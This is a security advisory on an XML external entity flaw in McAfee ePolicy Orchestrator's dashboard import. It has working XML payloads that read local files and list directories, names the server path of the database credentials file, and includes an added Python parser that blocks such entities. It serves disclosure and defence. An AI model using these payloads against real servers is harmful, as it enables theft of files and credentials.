McAfee ePolicy Orchestrator XML External Entity Expansion

25 Feb 2014 00:00:00, reported by redteam-pentesting.de. Type: packetstorm (packetstormsecurity.com)


Advisory: McAfee ePolicy Orchestrator XML External Entity Expansion in  
Dashboard  
  
RedTeam Pentesting identified an XML external entity expansion  
vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature.  
Users with the ability to create new dashboards in the ePO web interface  
who exploit this vulnerability can read local files on the ePO server,  
including sensitive data like the ePO database configuration.  
  
  
Details  
=======  
  
Product: McAfee ePolicy Orchestrator  
Affected Versions: 4.6.7 and below  
Fixed Versions: 4.6.7 + hotfix 940148  
Vulnerability Type: XML External Entity Expansion  
Security Risk: high  
Vendor URL: http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx  
Vendor Status: hotfix released  
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-001  
Advisory Status: public  
CVE: GENERIC-MAP-NOMATCH  
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH  
  
  
Introduction  
============  
  
McAfee ePO allows other systems to be centrally managed, including  
deploying new software and collecting system information. Dashboards  
allow privileged users to view statistics and current data about ePO and  
associated systems.  
  
  
More Details  
============  
  
Users of McAfee ePO's web interface can be granted the permission to add  
new dashboards. Dashboard definitions can be exported as XML data and  
imported again. A basic XML dashboard definition looks as follows:  
  
<dashboard id="1">  
<name>RedTeam Pentesting</name>  
<filteringEnabled>false</filteringEnabled>  
</dashboard>  
  
Importing a dashboard consists of uploading the XML data and confirming  
the import afterwards. On the confirmation page the dashboard's name  
defined in the XML tag "name" is shown.  
  
The ePO system allows a user-defined DTD to be added to the XML data,  
and therefore additional entities, which the system expands. The  
following example results in a dashboard with the name "RedTeam  
Pentesting Entity":  
  
<?xml version="1.0"?>  
<!DOCTYPE dashboard [  
<!ENTITY redteam "RedTeam Pentesting Entity">  
]>  
<dashboard id="1">  
<name>&redteam;</name>  
<filteringEnabled>false</filteringEnabled>  
</dashboard>  
  
It is also possible to specify external entities that, for example,  
point to local files on the ePO server. The entity is then expanded to  
the file's content. This works as long as the file contents do not make  
the resulting XML data invalid; binary data or files that themselves  
contain XML, for example, cannot be read this way.  
  
If the entity is used in the dashboard's name, the confirmation page  
shown when importing a dashboard displays the contents of the file.  
  
The following example XML data can be uploaded to read the file  
C:\boot.ini:  
  
<?xml version="1.0"?>  
<!DOCTYPE dashboard [  
<!ENTITY redteam SYSTEM "file:///c:/boot.ini">  
]>  
<dashboard id="1">  
<name>&redteam;</name>  
<filteringEnabled>false</filteringEnabled>  
</dashboard>  
  
It is also possible to get directory listings by using a file URL that  
points to a directory, for example the C: drive:  
  
<!ENTITY redteam SYSTEM "file:///c:/">  
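An added example (not RedTeam Pentesting's or McAfee's code) of the check the import step is missing: a dashboard parser built on Python's expat bindings that refuses any DOCTYPE or entity declaration before it can be expanded, run over the advisory's benign and file:/// dashboard definitions.

```python
import xml.parsers.expat

class UnsafeDashboardXML(ValueError): pass  # DTD or entity in an upload

def parse_dashboard(xml_text):
    """Parse a dashboard definition, refusing any DOCTYPE or entity before
    it can be expanded. Returns {'id', 'name', 'filteringEnabled'}."""
    result, buf = {}, []
    p = xml.parsers.expat.ParserCreate()

    def reject(*_):
        # A dashboard definition never needs a DTD, so a DOCTYPE, an
        # <!ENTITY> declaration or an external entity reference is refused.
        raise UnsafeDashboardXML("DTD / entity declarations are not allowed")

    def start(name, attrs):
        buf.clear()
        if name == "dashboard":
            result["id"] = attrs.get("id")

    def end(name):
        text = "".join(buf).strip()
        if name == "name":
            result["name"] = text
        elif name == "filteringEnabled":
            result["filteringEnabled"] = text == "true"

    p.StartDoctypeDeclHandler = reject
    p.EntityDeclHandler = reject
    p.ExternalEntityRefHandler = reject
    p.StartElementHandler = start
    p.EndElementHandler = end
    p.CharacterDataHandler = buf.append
    p.Parse(xml_text, True)
    return result

def import_verdict(xml_text):
    """What the import step should do with an upload: accept or reject."""
    try:
        return "accepted", parse_dashboard(xml_text)
    except UnsafeDashboardXML as exc:
        return "rejected", str(exc)

# Constructed samples, copied from the advisory's dashboard definitions.
BENIGN = ('<dashboard id="1"><name>RedTeam Pentesting</name>'
          '<filteringEnabled>false</filteringEnabled></dashboard>')
EXTERNAL_ENTITY = ('<?xml version="1.0"?><!DOCTYPE dashboard ['
                   '<!ENTITY redteam SYSTEM "file:///c:/boot.ini">]>'
                   '<dashboard id="1"><name>&redteam;</name>'
                   '<filteringEnabled>false</filteringEnabled></dashboard>')
```

Because the DOCTYPE handler fires before any entity is declared or referenced, the rejection happens regardless of whether the entity is internal, external, or points at a directory.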
  
  
Workaround  
==========  
  
RedTeam Pentesting is not aware of any workarounds.  
  
  
Fix  
===  
  
McAfee has issued a hotfix[0] for version 4.6.7 that removes the  
vulnerability. An upgrade to the newer 5.x branch of the product will  
also resolve this problem.  
  
  
Security Risk  
=============  
  
The vulnerability is mitigated by the fact that users already need valid  
login credentials for the ePO system and the permission to create  
dashboards for successful exploitation.  
  
It is nevertheless considered high risk, as it gives attackers the  
opportunity to read potentially sensitive file contents on the server.  
This includes, for example, ePO's database credentials, which are  
typically stored in a file available at a path like the following:  
  
C:\programs\mcafee\epolicy orchestrator\server\conf\orion\db.properties  
  
The credentials in this file are encrypted with a static key that is  
publicly known and included for example in Metasploit[1].  
  
Depending on the actual network structure, it might be possible to use  
the decrypted credentials to read and alter the information in the ePO  
database. This might lead to a compromise of the clients that are  
managed by ePO.  
  
  
Timeline  
========  
  
2013-11-20 Vulnerability identified  
2013-11-22 Customer decided to coordinate disclosure with vendor  
2014-02-14 Vendor replied to customer  
2014-02-24 Vendor released hotfix for version 4.6.7 and a public  
Security Bulletin[0]  
2014-02-25 Advisory released  
  
  
References  
==========  
  
[0] https://kc.mcafee.com/corporate/index?page=content&id=SB10065  
[1] https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/epo_sql.rb  
  
  
RedTeam Pentesting GmbH  
=======================  
  
RedTeam Pentesting offers individual penetration tests and short  
pentests, performed by a team of specialised IT security experts. In  
this way, security weaknesses in company networks or products are  
uncovered and can be fixed immediately.  
  
As there are only a few experts in this field, RedTeam Pentesting wants  
to share its knowledge and enhance public knowledge with research in  
security-related areas. The results are made available as public  
security advisories.  
  
More information about RedTeam Pentesting can be found at  
https://www.redteam-pentesting.de.  
  
--   
RedTeam Pentesting GmbH Tel.: +49 241 510081-0  
Dennewartstr. 25-27 Fax : +49 241 510081-99  
52068 Aachen https://www.redteam-pentesting.de  
Germany Registergericht: Aachen HRB 14004  
Geschäftsführer: Patrick Hof, Jens Liebchen  
